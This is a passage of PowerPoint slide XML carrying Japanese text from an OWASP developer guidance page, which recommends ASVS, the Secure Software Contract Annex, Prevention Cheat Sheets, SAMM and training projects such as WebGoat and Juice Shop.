                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>OWASP project inventory</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>を開くと、すべての</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>Flagship</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>Labs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>Incubator</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>プロジェクトがあります。ほとんどの</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>の資料は</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" baseline="0" dirty="0" err="1">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>で閲覧ができます。そして</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>の多くの文書を</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>ハードコピーや電子書籍</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>で注文できます。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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914400" y="2925080"/>
            <a:ext cx="8763000" cy="54483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89400"/>
              <a:ext cx="5608321" cy="706608"/>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spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>セキュアな</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Web</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アプリケーション開発のために、各アプリケーションにおけるセキュリティ要件を定義しなければなりません。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>では、アプリケーションのセキュリティ要件設定におけるガイドとして</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7"/>
                </a:rPr>
                <a:t>OWASP Application Security Verification Standard (ASVS)</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を活用することを推奨します。もし開発を外部に委託するのであれば、</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8"/>
                </a:rPr>
                <a:t>OWASP Secure Software Contract Annex</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を参照してください。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" b="1" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>注意</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="1" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>このドキュメントは米国の契約法に基づきます。そのため、当該ドキュメントのサンプルを活用する前に、弁護士に相談してください。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" kern="12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5" name="Rectangle: Rounded Corners 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="2932907"/>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800" kern="12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8" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="3998862"/>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ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>アプリケーションや</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>にセキュリティを後付けで組み込むよりもむしろ、開発初期段階からセキュリティを設計に組み込む方が、コスト効率がずっと良くなります。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>では、まず開発初期からセキュリティを設計に組み込む指針に</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:hlinkClick r:id="rId9"/>
                </a:rPr>
                <a:t>OWASP Prevention Cheat Sheets</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>を推奨します。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="8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9" name="Rectangle: Rounded Corners 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="3942369"/>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0" tIns="64946" rIns="0" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="700" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>アプリケーション</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="ja-JP" sz="700" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="700" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>セキュリティ</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="ja-JP" sz="700" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="700" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>アーキテクチャ</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="7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2" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="5018637"/>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ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>強力かつ可用なセキュリティ制御の構築は困難です。標準なセキュリティ制御を組み合わせることで、セキュアなアプリケーションまたは</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>開発を根本的に簡略化できます。開発者はまず</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9"/>
                </a:rPr>
                <a:t>OWASP Prevention Cheat Sheets</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </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を参照するとよいでしょう。そして、最新のフレームワークでは、認可・検証・</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CSRF</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>対策などの標準的なセキュリティ制御を効率よく実装できます。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="8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3" name="Rectangle: Rounded Corners 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="4962145"/>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ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>標準的な</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>セキュリティ制御</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="8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4" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="6035954"/>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defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>セキュアなアプリケーションや</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>API</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を開発する際に、組織が従うべきプロセスを改善するため、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>は</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0"/>
                </a:rPr>
                <a:t>OWASP Software Assurance Maturity Model (SAMM)</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を推奨しています。組織が直面する特定のリスクに適応するソフトウェアセキュリティの戦略を構築および実施する際に、このモデルが役に立ちます。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="8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5" name="Rectangle: Rounded Corners 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="5979462"/>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800" b="1"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6" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="7053253"/>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defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pP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1"/>
                </a:rPr>
                <a:t>OWASP Education Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>では、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Web</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アプリケーションセキュリティに関する開発者向けトレーニングに役立つ教育コンテンツを公開しています。脆弱性に関する実地訓練には、</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2"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0" err="1">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId12"/>
                </a:rPr>
                <a:t>WebGoat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0" err="1">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId13"/>
                </a:rPr>
                <a:t>WebGoat.NET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>、</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4"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0" err="1">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId14"/>
                </a:rPr>
                <a:t>NodeJS</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4"/>
                </a:rPr>
                <a:t> Goat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>、</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5"/>
                </a:rPr>
                <a:t>OWASP Juice Shop Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>、そして</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6"/>
                </a:rPr>
                <a:t>OWASP Broken Web Applications Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>を試してください。最新情報の入手には、</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7"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0" err="1">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId17"/>
                </a:rPr>
                <a:t>AppSec</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7"/>
                </a:rPr>
                <a:t> Conference</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>、</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7"/>
                </a:rPr>
                <a:t>OWASP Conference Training</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>、そして各地で開催される</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t>OWASP Chapter meetings</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>に参加してください。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle: Rounded Corners 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="6996761"/>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0" tIns="64946" rIns="0" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                  <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
